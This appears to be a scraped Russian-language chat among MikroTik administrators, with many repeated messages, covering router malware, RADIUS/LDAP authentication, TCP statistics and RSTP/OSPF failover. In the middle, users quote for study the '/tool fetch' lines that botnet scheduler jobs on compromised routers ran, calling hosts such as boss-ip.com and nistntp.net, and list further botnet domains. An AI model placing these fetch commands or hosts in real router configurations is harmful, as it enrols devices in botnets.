во первых в брузере есть антифишинг

во вторых у тебя всплывет акно о загрузке

я на кртинке вижу уведомлние антвивиря про файл заставки и какой-то тиковый скрипт. связь между ними какая-то есть?

максимум может в кэш положить

но кому он там всрался без запуска

во вторых у тебя всплывет акно о загрузке

путь посмотри

выше

загрузки

ну и чего

я на кртинке вижу уведомлние антвивиря про файл заставки и какой-то тиковый скрипт. связь между ними какая-то есть?

есть

скорее всего

ну и чего

крч

думай сам )

защиты от дауна пока не изобрели ты из без микротика можешь потыкать на суперпрограмма для увелечения члена за 5 минут

с таким же успехом

скорее всего

т.е. нет уверенности?

да, ток на главной странице поп сайтов, ты таких суперувеличалок не встретишь

т.е. нет уверенности?

нет, т.к. не ловил, но примерно можно догадаться, что этот скрипт может сделать

правда а откуда же я о них знаю? -)

правда а откуда же я о них знаю? -)

меньше в браззерз надо залепать ))

так оно обычно и бывает, я чего то нажал\а чето установилось\обновилось

и начал сыпать мусором браузер

но сначало то нужно тыкнуть

чистая соц инженерия

никкаих взломов

так смысл вируса в том, что даже тыкать не надо, идеш на попсовый сайт и автоматом чета качается, хомяк думает че за херь, нук запущу

как в л7 запретили качать ехе архивы и яваскрипт там сразу увеличители исчезли

дай мне такой сайт

если еще запретить даблклик так воообще антивирусы удалять можно

причем тут дабл клик, госпади, объясните ему, у мя не получается

как в л7 запретили качать ехе архивы и яваскрипт там сразу увеличители исчезли

л7 https не порежет

да

потому надежнее запретить даблклик

-)

ну криптовымогатели можно просто политикой зарезать

я на кртинке вижу уведомлние антвивиря про файл заставки и какой-то тиковый скрипт. связь между ними какая-то есть?

это в шедулере задания

во ещё для изучения: {/tool fetch url=("http://www.boss-ip.com/Core/Update.ashx\?key=5bc24d5c0d21bf27&action=upload&sncode=EBD4E1782A14856537C082686E2020B2&dynamic=static") keep-result=no} домен рабочий

Ожидаемо появились, там же протокол изменился

мда уж... совсем это неприкольно... и шо теперь делать с этим, как жить то... схема freeradius+ldap+mschap по хорошему работать не будет... не хранить же пароли в cleartext...

вот это босс-ип встречал

курлом скачать не получилось, насколько я помню

Всем привет. Вопрос: Mesh wireless можно использовать для бесшовного роуминга?

мда уж... совсем это неприкольно... и шо теперь делать с этим, как жить то... схема freeradius+ldap+mschap по хорошему работать не будет... не хранить же пароли в cleartext...

у меня как раз в таком виде на такой связке и заработало. А до этого логин в винбоксе только при условии включения обратимого шифрования заводился

курлом скачать не получилось, насколько я помню

wget скачал вроде

у меня как раз в таком виде на такой связке и заработало. А до этого логин в винбоксе только при условии включения обратимого шифрования заводился

в каком виде пароли хранятся в ldap? если в cleartext либо nt тогда должно заработать, если хешированные - тогда не будет

во ещё для изучения: {/tool fetch url=("http://www.boss-ip.com/Core/Update.ashx\?key=5bc24d5c0d21bf27&action=upload&sncode=EBD4E1782A14856537C082686E2020B2&dynamic=static") keep-result=no} домен рабочий

Ещё один: /tool fetch url=http://nistntp.net:8080/took

слушайте а кто из вас в тсп разбирается?

Строчки от двух разных ботнетов. Конкуренция =)

cubic rto:8000 mss:524 cwnd:1 ssthresh:7 unacked:1 retrans:1/3 lost:1

че эт значит?

Строчки от двух разных ботнетов. Конкуренция =)

да, ещё один нашёл в шедулере: что-то там .bike.net

cubic wscale:7,7 rto:432 rtt:228.387/0.147 ato:40 mss:1366 ssthresh:2 send 95.7Kbps retrans:0/8 rcv_rtt:240 rcv_space:29200

это сильно плохо?

в каком виде пароли хранятся в ldap? если в cleartext либо nt тогда должно заработать, если хешированные - тогда не будет

да, у меня вот так радиус делает /usr/bin/ntlm_auth --request-nt-key а самба уже в лдап запрашивает

да, ещё один нашёл в шедулере: что-то там .bike.net

такой я не встречал, а вот от старого аж коллекция адресов: bampombam.bpb.cbes.net createpage.myserv.ignorelist.com trompadiom.tutotame.bigbox.info

такой я не встречал, а вот от старого аж коллекция адресов: bampombam.bpb.cbes.net createpage.myserv.ignorelist.com trompadiom.tutotame.bigbox.info

Кстати, последний из них раньше вёл в Болгарию, а сейчас — в Южную Корею.

Через 10 минут после загрузки с интервалом в 60 секунд

Всем привет. Вопрос: Mesh wireless можно использовать для бесшовного роуминга?

Можно, отчего ж нет

Раньше Ping Timeout отсутствовал. Какой интервал тогда был?

Оу, сорри, думал там Ping Interval. По ходу ответ ждет до 60 секунд (что не очень-то логично)

Есть хитровыдуманная задача - 2 микротика в сети провайдера в одном vlan. У провайдера подвисают свичи в одной из точек. (Провайдера не сменить, свичи не поменять, примем это как условия). Нужно обеспечить доступность микротика за зависшим свичом по тому же адресу, что он был доступен и через провайдера. Накрутил эту схемку, допустим я делаю L2 vpn, объединяю входящие порты от провайдера в бридж с этим туннелем, запускаю RSTP. Как быстро свичи провайдера узнают о том, что маки поменялись? На какое время сходимости RSTP можно рассчитывать?

синее - моё, красное - выпадающий свич провайдера, какая там на самом деле топология - хз

пытаюсь сбросить hex r3, выключаю, зажимаю резет, подаю питание, начинает гореть юзр, потом он мигает, потом он горит, а потом я перестаю жать резет, но он не сбрасывает, что я делаю не так?

Есть хитровыдуманная задача - 2 микротика в сети провайдера в одном vlan. У провайдера подвисают свичи в одной из точек. (Провайдера не сменить, свичи не поменять, примем это как условия). Нужно обеспечить доступность микротика за зависшим свичом по тому же адресу, что он был доступен и через провайдера. Накрутил эту схемку, допустим я делаю L2 vpn, объединяю входящие порты от провайдера в бридж с этим туннелем, запускаю RSTP. Как быстро свичи провайдера узнают о том, что маки поменялись? На какое время сходимости RSTP можно рассчитывать?

какие маки поменяются?

ERROR: S client not available

господа, а чем разрулить 3 айпишника от одного прова в одном кабеле?

господа, а чем разрулить 3 айпишника от одного прова в одном кабеле?

куда разрулить? )

на интерфейс сколько хочется можно вешать адресов

куда разрулить? )

на разные айпи стучатся по разным портам

на интерфейс сколько хочется можно вешать адресов

а оно корректно работать то будет?

какие маки поменяются?

вот роутер 10.0.0.3, он включен в свич провайдера. Через lte модем поднят l2 туннель до другого роутера, который тоже включен в свич провайдера, оба этих порта в одном vlan. Вот когда вырубается свич красный, нужно чтобы роутер 10.0.0.3 продолжил работать, имея тот же ip, но чтобы трафик сначала шел через туннель до второго микрота, и выходил к провайдеру через порт того микротика

а оно корректно работать то будет?

а чего ему сделается. Ну только имейте ввиду, что маскарадинг выбирает первый адрес по порядку например.

соответственно сначала мак был за красным роутером, а станет за другим, насколько это быстро отработает?

а чего ему сделается. Ну только имейте ввиду, что маскарадинг выбирает первый адрес по порядку например.

а как загнать всех пользователей в инет через один айпи?

соответственно сначала мак был за красным роутером, а станет за другим, насколько это быстро отработает?

По протоколу же)

а как загнать всех пользователей в инет через один айпи?

А что ты хочешь делать с 3мя ip? Есть vrf, routing-mark, pref-source...

соответственно сначала мак был за красным роутером, а станет за другим, насколько это быстро отработает?

мгновенно это отработает. Если сделать так - тоннель от Роутрер10.0.0.2 до Роутер10.0.0.3, этот тоннель в бридж на обоих роутерах с тем интерфейсом, который "основной", и у этого тоннеля на обоих сторона Root Path Cost сделать повыше

вот роутер 10.0.0.3, он включен в свич провайдера. Через lte модем поднят l2 туннель до другого роутера, который тоже включен в свич провайдера, оба этих порта в одном vlan. Вот когда вырубается свич красный, нужно чтобы роутер 10.0.0.3 продолжил работать, имея тот же ip, но чтобы трафик сначала шел через туннель до второго микрота, и выходил к провайдеру через порт того микротика

Чувак, не используй L2 туннели поверх PPP. Тебе нужен OSPF+BFD и без RSTP

А что ты хочешь делать с 3мя ip? Есть vrf, routing-mark, pref-source...

чтобы пользователи ходили в инет с конкретного белого айпи

а как загнать всех пользователей в инет через один айпи?

эм. Ну вместо маскарада используете нат, да и все

Чувак, не используй L2 туннели поверх PPP. Тебе нужен OSPF+BFD и без RSTP

провайдер просто отдаёт мне vlan на разных объектах, и не будет настраивать ospf cо своей стороны

чтобы пользователи ходили в инет с конкретного белого айпи

А остальные-то два куда?

А остальные-то два куда?

для подключения через dst-nat

провайдер просто отдаёт мне vlan на разных объектах, и не будет настраивать ospf cо своей стороны

А ему и не надо) У тебя ж 3 микротика под рукой

провайдер просто отдаёт мне vlan на разных объектах, и не будет настраивать ospf cо своей стороны

Да и похуй на его инфраструктуру. OSPF сам соберёшь

А ему и не надо) У тебя ж 3 микротика под рукой

два, один за отваливающимся свичом, второй за стабильным

а 10.0.0.1 чей?

шлюз провайдера

погоди, а ты откуда обращаешься?

там пунктиром нарисовано

моё - только синее

тоесть как мне видится, мне нужно добавить по бриджу и запустить на них rstp, чтобы вышла типа петля через VPN туннель

тоесть как мне видится, мне нужно добавить по бриджу и запустить на них rstp, чтобы вышла типа петля через VPN туннель

Чувак, забей на L2 + RSTP

как сделать на l3 маршрутизации - хз, нужно чтобы внешний адрес оставался доступен

ну тебе ничего не мешает на бриджах и ospf поднять, анонсить будешь по /32.

тоесть как мне видится, мне нужно добавить по бриджу и запустить на них rstp, чтобы вышла типа петля через VPN туннель

ну только у второго l2 стоимость должна быть выше, тогда петли не будет, и будет работать, как вам хочется

но eoip через радио удовольствие существенно ниже среднего, имейте ввиду